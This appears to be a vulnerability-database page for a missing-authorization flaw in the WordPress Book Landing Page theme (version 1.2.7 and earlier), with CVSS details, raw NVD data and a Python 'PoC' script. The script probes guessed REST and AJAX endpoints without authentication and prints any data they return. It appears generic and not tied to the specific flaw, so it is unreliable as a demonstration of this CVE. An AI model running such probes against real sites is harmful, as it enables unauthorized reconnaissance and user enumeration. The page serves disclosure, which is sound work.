Security Vulnerability Report
中文
CVE-2026-32378 CVSS 5.3 MEDIUM

CVE-2026-32378

Published: 2026-03-13 19:54:53
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Book Landing Page book-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Book Landing Page: from n/a through <= 1.2.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Book Landing Page Theme <= 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32378 PoC - WordPress Book Landing Page Missing Authorization # Target: WordPress sites with Book Landing Page theme <= 1.2.7 # Type: Broken Access Control import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2026-32378 This POC demonstrates accessing normally protected endpoints without authentication """ # Common WordPress REST API endpoints that might be affected endpoints = [ '/wp-json/book-landing-page/v1/', '/wp-json/book-landing/v1/', '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users', ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) # Check if we can access protected data without auth if response.status_code == 200: # Additional checks for sensitive data exposure if 'application/json' in response.headers.get('Content-Type', ''): data = response.json() # Check if sensitive data is exposed if data and len(str(data)) > 0: print(f"[!] Potentially vulnerable endpoint found: {url}") print(f"[+] Response: {str(data)[:200]}...") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[*] Protected endpoint (expected behavior): {url}") except requests.exceptions.RequestException as e: print(f"[*] Error accessing {url}: {e}") return vulnerable def main(): if len(sys.argv) < 2: print("Usage: python cve-2026-32378-poc.py <target_url>") print("Example: python cve-2026-32378-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning target: {target}") print(f"[*] CVE-2026-32378: Book Landing Page Missing Authorization\n") if check_vulnerability(target): print("\n[!] Target appears to be VULNERABLE to CVE-2026-32378") print("[!] Recommendation: Update Book Landing Page theme to latest version") else: print("\n[*] No obvious vulnerability detected (manual verification recommended)") if __name__ == "__main__": main() # Note: This is a demonstration script. Actual exploitation requires # identifying specific vulnerable endpoints in the theme code. # Always obtain proper authorization before testing.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32378", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:52.587", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Book Landing Page book-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Book Landing Page: from n/a through <= 1.2.7."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Book Landing Page book-landing-page permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Book Landing Page: desde n/a hasta &lt;= 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/book-landing-page/vulnerability/wordpress-book-landing-page-theme-1-2-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}